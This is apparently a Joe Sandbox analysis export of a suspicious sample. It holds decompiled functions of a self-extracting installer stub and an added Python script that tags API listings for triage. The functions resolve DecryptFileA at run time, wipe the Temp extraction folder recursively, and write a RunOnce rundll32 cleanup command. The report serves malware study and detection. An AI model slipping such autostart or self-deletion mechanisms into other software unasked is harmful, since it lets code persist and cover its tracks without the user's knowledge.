• API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
• String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
• API String ID: 383838535-3401884814
• Opcode ID: c8b59be3ecd7402891224441410b6a4da130b086deb95bc5b298249001c79447
• Instruction ID: f9149fba818da065279cf605ccd6695ddd1f631f902359c6b4415a4d580f2109
• Opcode Fuzzy Hash: c8b59be3ecd7402891224441410b6a4da130b086deb95bc5b298249001c79447
• Instruction Fuzzy Hash: 49A14B71E002187BEB209B24CC44FEA776BBB95320F1C4297E555A33D1DBB49D89EB50
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(Graph image omitted: basic blocks of E00FD2F1D from fd2f1d to fd30b7, marked executed / not executed; the graph covers the GetSystemDirectoryA, LoadLibraryA, GetProcAddress, DecryptFileA, FreeLibrary and SetCurrentDirectoryA calls shown in the decompiled code below.)
C-Code - Quality: 82%
E00FD2F1D(void* __ecx, int __edx) {
	signed int _v8;
	char _v272;
	_Unknown_base(*)()* _v276;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t9;
	void* _t11;
	struct HWND__* _t12;
	void* _t14;
	int _t21;
	signed int _t22;
	signed int _t25;
	intOrPtr* _t26;
	signed int _t27;
	void* _t30;
	_Unknown_base(*)()* _t31;
	void* _t34;
	struct HINSTANCE__* _t36;
	intOrPtr _t41;
	intOrPtr* _t44;
	signed int _t46;
	int _t47;
	void* _t58;
	void* _t59;

	_t43 = __edx;
	_t9 =  *0xfd8004; // 0x42de454f
	_v8 = _t9 ^ _t46;
	if( *0xfd8a38 != 0) {
		L5:
		_t11 = E00FD5164(_t52);
		_t53 = _t11;
		if(_t11 == 0) {
			L16:
			_t12 = 0;
			L17:
			return E00FD6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
		}
		_t14 = E00FD55A0(_t53); // executed
		if(_t14 == 0) {
			goto L16;
		} else {
			_t45 = 0x105;
			GetSystemDirectoryA( &_v272, 0x105);
			_t43 = 0x105;
			_t40 =  &_v272;
			E00FD658A( &_v272, 0x105, "advapi32.dll");
			_t36 = LoadLibraryA( &_v272);
			_t44 = 0;
			if(_t36 != 0) {
				_t31 = GetProcAddress(_t36, "DecryptFileA");
				_v276 = _t31;
				if(_t31 != 0) {
					_t45 = _t47;
					_t40 = _t31;
					 *0xfda288("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\", 0); // executed
					_v276();
					if(_t47 != _t47) {
						_t40 = 4;
						asm("int 0x29");
					}
				}
			}
			FreeLibrary(_t36);
			_t58 =  *0xfd8a24 - _t44; // 0x0
			if(_t58 != 0) {
				L14:
				_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\"); // executed
				if(_t21 != 0) {
					__eflags =  *0xfd8a2c - _t44; // 0x0
					if(__eflags != 0) {
						L20:
						__eflags =  *0xfd8d48 & 0x000000c0;
						if(( *0xfd8d48 & 0x000000c0) == 0) {
							_t41 =  *0xfd9a40; // 0x3, executed
							_t26 = E00FD256D(_t41); // executed
							_t44 = _t26;
						}
						_t22 =  *0xfd8a24; // 0x0
						 *0xfd9a44 = _t44;
						__eflags = _t22;
						if(_t22 != 0) {
							L26:
							__eflags =  *0xfd8a38;
							if( *0xfd8a38 == 0) {
								__eflags = _t22;
								if(__eflags == 0) {
									E00FD4169(__eflags);
								}
							}
							_t12 = 1;
							goto L17;
						} else {
							__eflags =  *0xfd9a30 - _t22; // 0x0
							if(__eflags != 0) {
								goto L26;
							}
							_t25 = E00FD3BA2(); // executed
							__eflags = _t25;
							if(_t25 == 0) {
								goto L16;
							}
							_t22 =  *0xfd8a24; // 0x0
							goto L26;
						}
					}
					_t27 = E00FD3B26(_t40, _t44);
					__eflags = _t27;
					if(_t27 == 0) {
						goto L16;
					}
					goto L20;
				}
				_t43 = 0x4bc;
				E00FD44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
				 *0xfd9124 = E00FD6285();
				goto L16;
			}
			_t59 =  *0xfd9a30 - _t44; // 0x0
			if(_t59 != 0) {
				goto L14;
			}
			_t30 = E00FD621E(); // executed
			if(_t30 == 0) {
				goto L16;
			}
			goto L14;
		}
	}
	_t49 =  *0xfd8a24;
	if( *0xfd8a24 != 0) {
		L4:
		_t34 = E00FD3A3F(_t51);
		_t52 = _t34;
		if(_t34 == 0) {
			goto L16;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(E00FD51E5(_t49) == 0) {
                                                                                                                                                                                                    					goto L16;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t51 =  *0xfd8a38;
                                                                                                                                                                                                    				if( *0xfd8a38 != 0) {
                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L4;
                                                                                                                                                                                                    			}

APIs
• GetSystemDirectoryA.KERNEL32 ref: 00FD2F93
• LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00FD2FB2
• GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00FD2FC6
• DecryptFileA.ADVAPI32 ref: 00FD2FE6
• FreeLibrary.KERNEL32(00000000), ref: 00FD2FF8
• SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00FD301C
  • Part of subcall function 00FD51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00FD2F4D,?,00000002,00000000), ref: 00FD5201
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                    • API String ID: 2126469477-3395714304
                                                                                                                                                                                                    • Opcode ID: 137192de2ea147f74bed7dde1abdf0f1193cf6b0f75df20796d3fa4e85f11764
                                                                                                                                                                                                    • Instruction ID: d66007e389daef2f5ae5f88f126266f50522fc7a8203ef067cd8c5ab36d2543e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 137192de2ea147f74bed7dde1abdf0f1193cf6b0f75df20796d3fa4e85f11764
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF419A31E012199ADB30ABB19C4D75633AB9B547A5F0C0567EA41C2391EF78CE81FA62
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph
C-Code - Quality: 86%
/* E00FD2390: recursive directory wipe. Given a directory path in ECX it
   builds "<path>*", enumerates the directory, deletes every plain file
   (after resetting its attributes to FILE_ATTRIBUTE_NORMAL, 0x80, so that
   read-only files go too), recurses into every subdirectory other than
   "." and "..", and finally removes the directory itself. This is the
   routine that removes the extraction folder
   (C:\Users\user\AppData\Local\Temp\IXP003.TMP\) named in the
   SetCurrentDirectoryA call above, so dropped files have to be captured
   before it runs.
   Reading notes on the decompiler output (quality 86%): _v276/_v280/_v284
   appear to be one MAX_PATH (0x104-byte) path buffer seen at drifting
   stack offsets, and _v604.ftCreationTime / _v596.dwReserved1 /
   _v596.cFileName appear to be dwFileAttributes and cFileName of a single
   WIN32_FIND_DATAA. E00FD1680 / E00FD16B3 behave as bounded string copy /
   append helpers, E00FD658A most likely appends the "\" separator
   (0xfd1140), and E00FD6CE0 is the /GS stack-cookie check. */
E00FD2390(CHAR* __ecx) {
	signed int _v8;                      // /GS stack cookie
	char _v276;                          // path buffer (MAX_PATH)
	char _v280;
	char _v284;
	struct _WIN32_FIND_DATAA _v596;
	struct _WIN32_FIND_DATAA _v604;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t21;
	int _t36;
	void* _t46;
	void* _t62;
	void* _t63;                          // search handle from FindFirstFileA
	CHAR* _t65;                          // directory to wipe
	void* _t66;
	signed int _t67;
	signed int _t69;

	_t69 = (_t67 & 0xfffffff8) - 0x254;  // 8-byte aligned stack frame
	_t21 =  *0xfd8004; // 0x42de454f     // __security_cookie
	_t22 = _t21 ^ _t69;
	_v8 = _t21 ^ _t69;
	_t65 = __ecx;
	if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {   // NULL or empty path: nothing to do
		L10:
		_pop(_t62);
		_pop(_t66);
		_pop(_t46);
		return E00FD6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);   // cookie check, return
	} else {
		E00FD1680( &_v276, 0x104, __ecx);            // buf = path
		_t58 = 0x104;
		E00FD16B3( &_v280, 0x104, "*");              // buf += "*"  (path already ends in "\")
		_t22 = FindFirstFileA( &_v284,  &_v604); // executed
		_t63 = _t22;
		if(_t63 == 0xffffffff) {                     // INVALID_HANDLE_VALUE: directory unreadable or missing
			goto L10;
		} else {
			goto L3;
		}
		do {
			L3:
			_t58 = 0x104;
			E00FD1680( &_v276, 0x104, _t65);         // buf = path
			if((_v604.ftCreationTime & 0x00000010) == 0) {   // !(dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
				_t58 = 0x104;
				E00FD16B3( &_v276, 0x104,  &(_v596.dwReserved1));   // buf += cFileName
				SetFileAttributesA( &_v280, 0x80);   // FILE_ATTRIBUTE_NORMAL: drop read-only/hidden/system
				DeleteFileA( &_v280);
			} else {
				if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
					E00FD16B3( &_v276, 0x104,  &(_v596.cFileName));   // buf += cFileName
					_t58 = 0x104;
					E00FD658A( &_v280, 0x104, 0xfd1140);            // buf += "\" (separator string)
					E00FD2390( &_v284);                             // recurse into subdirectory
				}
			}
			_t36 = FindNextFileA(_t63,  &_v596); // executed
		} while (_t36 != 0);
		FindClose(_t63); // executed
		_t22 = RemoveDirectoryA(_t65); // executed   // directory is empty now
		goto L10;
	}
}

APIs
• FindFirstFileA.KERNELBASE(?,00FD8A3A,00FD11F4,00FD8A3A,00000000,?,?), ref: 00FD23F6
• lstrcmpA.KERNEL32(?,00FD11F8), ref: 00FD2427
• lstrcmpA.KERNEL32(?,00FD11FC), ref: 00FD243B
• SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00FD2495
• DeleteFileA.KERNEL32(?), ref: 00FD24A3
• FindNextFileA.KERNELBASE(00000000,00000010), ref: 00FD24AF
• FindClose.KERNELBASE(00000000), ref: 00FD24BE
• RemoveDirectoryA.KERNELBASE(00FD8A3A), ref: 00FD24C5
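As an added example (not part of this Joe Sandbox report or of its tooling), the Python script below parses "APIs" listings in the format shown above and derives the two findings these two listings support: the run-time resolution of DecryptFileA from advapi32.dll through LoadLibraryA/GetProcAddress in the first listing, and the FindFirstFileA/DeleteFileA/RemoveDirectoryA self-cleanup pattern in the second. The sample input is constructed from the lines on this page; the line regex, the tag names and the A/W-suffix normalisation are assumptions of the example, not Joe Sandbox behaviour.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the two "APIs" listings shown on this page.
DECRYPT_BLOCK = """\
• GetSystemDirectoryA.KERNEL32 ref: 00FD2F93
• LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00FD2FB2
• GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00FD2FC6
• DecryptFileA.ADVAPI32 ref: 00FD2FE6
• FreeLibrary.KERNEL32(00000000), ref: 00FD2FF8
• SetCurrentDirectoryA.KERNELBASE(C:\\Users\\user\\AppData\\Local\\Temp\\IXP003.TMP\\), ref: 00FD301C
  • Part of subcall function 00FD51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00FD2F4D,?,00000002,00000000), ref: 00FD5201
"""
RMTREE_BLOCK = """\
• FindFirstFileA.KERNELBASE(?,00FD8A3A,00FD11F4,00FD8A3A,00000000,?,?), ref: 00FD23F6
• lstrcmpA.KERNEL32(?,00FD11F8), ref: 00FD2427
• lstrcmpA.KERNEL32(?,00FD11FC), ref: 00FD243B
• SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00FD2495
• DeleteFileA.KERNEL32(?), ref: 00FD24A3
• FindNextFileA.KERNELBASE(00000000,00000010), ref: 00FD24AF
• FindClose.KERNELBASE(00000000), ref: 00FD24BE
• RemoveDirectoryA.KERNELBASE(00FD8A3A), ref: 00FD24C5
"""

# One listing line: "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR",
# optionally prefixed with "Part of subcall function XXXX:" (assumed format).
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int        # call-site address
    subcall: bool   # reported from a called subroutine rather than this function


def parse_api_block(text):
    """Return the calls of one APIs listing in listing (call-site) order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings such as "Strings" or "Memory Dump Source"
        raw = m["args"]
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), m["sub"] is not None))
    return calls


def base_name(api):
    """Fold ANSI/wide variants together: FindFirstFileA/W -> FindFirstFile (assumption)."""
    return api.rstrip("AW")


def _hex(arg):
    try:
        return int(arg, 16)
    except ValueError:
        return None  # "?" or a string argument


def resolved_imports(calls):
    """Pair each GetProcAddress with the most recent LoadLibrary call and report
    (dll, function, seen_called_afterwards)."""
    current_dll, found = None, []
    for i, c in enumerate(calls):
        name = base_name(c.api)
        if name in ("LoadLibrary", "LoadLibraryEx") and c.args:
            dlls = [a for a in c.args if a.lower().endswith(".dll")]
            current_dll = dlls[0] if dlls else c.args[-1]
        elif c.api == "GetProcAddress" and len(c.args) >= 2:
            func = c.args[1]
            later = {x.api for x in calls[i + 1:]}
            found.append((current_dll, func, func in later))
    return found


CLEANUP_APIS = {"FindFirstFile", "FindNextFile", "DeleteFile", "RemoveDirectory"}
TEMP_MARKERS = ("\\temp\\", "\\tmp\\")
FILE_ATTRIBUTE_NORMAL = 0x80


def classify(calls):
    """Tag a function from its API set, the way a sandbox signature would."""
    names = {base_name(c.api) for c in calls}
    tags = set()
    if resolved_imports(calls):
        tags.add("dynamic-api-resolution")
    if CLEANUP_APIS <= names:
        tags.add("recursive-directory-wipe")
        if any(base_name(c.api) == "SetFileAttributes"
               and any(_hex(a) == FILE_ATTRIBUTE_NORMAL for a in c.args) for c in calls):
            tags.add("clears-attributes-before-delete")
    if any(m in a.lower() for c in calls for a in c.args for m in TEMP_MARKERS):
        tags.add("touches-temp-dir")
    return tags


if __name__ == "__main__":
    for label, block in (("E00FD2F..", DECRYPT_BLOCK), ("E00FD2390", RMTREE_BLOCK)):
        calls = parse_api_block(block)
        print(label, sorted(classify(calls)), resolved_imports(calls))
```

Run over the two listings it reports the first function as dynamic-api-resolution plus touches-temp-dir, with DecryptFileA resolved from advapi32.dll and then actually called, and the second as recursive-directory-wipe with the attribute reset; feeding it a whole report's worth of APIs blocks is a quick way to find every function that resolves imports at run time or deletes its own artifacts.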
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 836429354-0
                                                                                                                                                                                                    • Opcode ID: 16d9d955b60b7c19deef59971a30cf21934fc5717c004a2969d2801544204472
                                                                                                                                                                                                    • Instruction ID: efda0eeb793fb3c8843b6417a11f9fbb62c431233fe62e6f102e4a5688e13d2b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16d9d955b60b7c19deef59971a30cf21934fc5717c004a2969d2801544204472
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E231A832604644ABC320DB74DD4DAEB739EBFC5315F08492FB95582391EB38D909E792
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 70%
E00FD2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
	void* __ebx;
	void* __edi;
	void* __esi;
	void* __ebp;
	long _t4;
	void* _t6;
	intOrPtr _t7;
	void* _t9;
	struct HINSTANCE__* _t12;
	intOrPtr* _t17;
	signed char _t19;
	intOrPtr* _t21;
	void* _t22;
	void* _t24;
	intOrPtr _t32;

	_t4 = GetVersion();
	if(_t4 >= 0 && _t4 >= 6) {
		_t12 = GetModuleHandleW(L"Kernel32.dll");
		if(_t12 != 0) {
			_t21 = GetProcAddress(_t12, "HeapSetInformation");
			if(_t21 != 0) {
				_t17 = _t21;
				 *0xfda288(0, 1, 0, 0);
				 *_t21();
				_t29 = _t24 - _t24;
				if(_t24 != _t24) {
					_t17 = 4;
					asm("int 0x29");
				}
			}
		}
	}
	_t20 = _a12;
	_t18 = _a4;
	 *0xfd9124 = 0;
	if(E00FD2CAA(_a4, _a12, _t29, _t17) != 0) {
		_t9 = E00FD2F1D(_t18, _t20); // executed
		_t22 = _t9; // executed
		E00FD52B6(0, _t18, _t21, _t22); // executed
		if(_t22 != 0) {
			_t32 =  *0xfd8a3a; // 0x0
			if(_t32 == 0) {
				_t19 =  *0xfd9a2c; // 0x0
				if((_t19 & 0x00000001) != 0) {
					E00FD1F90(_t19, _t21, _t22);
				}
			}
		}
	}
	_t6 =  *0xfd8588; // 0x0
	if(_t6 != 0) {
		CloseHandle(_t6);
	}
	_t7 =  *0xfd9124; // 0x0
	return _t7;
}


APIs
• GetVersion.KERNEL32(?,00000002,00000000,?,00FD6BB0,00FD0000,00000000,00000002,0000000A), ref: 00FD2C03
• GetModuleHandleW.KERNEL32(Kernel32.dll,?,00FD6BB0,00FD0000,00000000,00000002,0000000A), ref: 00FD2C18
• GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00FD2C28
• CloseHandle.KERNEL32(00000000,?,?,00FD6BB0,00FD0000,00000000,00000002,0000000A), ref: 00FD2C98
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Handle$AddressCloseModuleProcVersion
• String ID: HeapSetInformation$Kernel32.dll
• API String ID: 62482547-3460614246
• Opcode ID: 5f03cf8d9b620d3d25c3fd969be92376eb85eb8df5c7b874056fd2155a4ee04c
• Instruction ID: 3f128e9f14b36b9c8c93545f7db93b08a09c0d20c5c1dc53855b7da0ac1cc65e
• Opcode Fuzzy Hash: 5f03cf8d9b620d3d25c3fd969be92376eb85eb8df5c7b874056fd2155a4ee04c
• Instruction Fuzzy Hash: 58112531A213096BC7617BB5AC89A2F376BAB943B0B0C0017F810D3354CA35DC01B6E5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD6F40() {
                                                                                                                                                                                                    
                                                                                                                                                                                                    				SetUnhandledExceptionFilter(E00FD6EF0); // executed
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}



0x00fd6f45
0x00fd6f4d

APIs
• SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00FD6F45
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 99314deffbf80ef403d775150fd57254e2450ba552af3f28560abc928c76b42b
• Instruction ID: acd3f754af4844797df6bcf1791458c2b0ee50f4d3dd9082eb1f6e02ddf59605
• Opcode Fuzzy Hash: 99314deffbf80ef403d775150fd57254e2450ba552af3f28560abc928c76b42b
• Instruction Fuzzy Hash: AA9002642521049796101B709D1941577935B4D602B855562E011C4595DB608040791B
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 93%
			E00FD202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0xfd8004; // 0x42de454f
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00FD6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E00FD171E("wextract_cleanup3", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup3", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E00FD658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0xfd9a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0xfd91e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0xfd91e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xfd91e5);
						if(_t90 != 0) {
							 *0xfd8580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
							E00FD171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup3", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E00FD44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E00FD658A( &_v268, 0x104, 0xfd1140);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                    				 *0xfd8530 = _t66;
                                                                                                                                                                                                    				goto L23;
                                                                                                                                                                                                    			}

Instruction listing, addresses 0x00fd202a to 0x00fd2266 (address column only; the instruction text is not present in this export)

APIs
• memset.MSVCRT ref: 00FD2050
• memset.MSVCRT ref: 00FD205F
• RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00FD208C
  • Part of subcall function 00FD171E: _vsnprintf.MSVCRT ref: 00FD1750
• RegQueryValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FD20C9
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FD20EA
• GetSystemDirectoryA.KERNEL32 ref: 00FD2103
• LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FD2122
• GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00FD2134
• FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FD2144
• GetSystemDirectoryA.KERNEL32 ref: 00FD215B
• GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FD218C
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FD21C1
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FD21E4
• RegSetValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00FD223D
• RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FD2249
• LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FD2250
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
• String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup3
• API String ID: 178549006-1281856606
• Opcode ID: 299b4c23ed9dcf199b3095ee3f6885a2c78db2f6983b70d1a0a6166d2837ca3b
• Instruction ID: 6190940e27c011f78bb2280b9c9a6440f3bf8755bcd234837ade3b46fc85cd8c
• Opcode Fuzzy Hash: 299b4c23ed9dcf199b3095ee3f6885a2c78db2f6983b70d1a0a6166d2837ca3b
• Instruction Fuzzy Hash: 21512772A01218ABDB20AF70DC4DFEB773FEB50740F0841A7F905E7251DA759D45AAA0
                                                                                                                                                                                                    Uniqueness

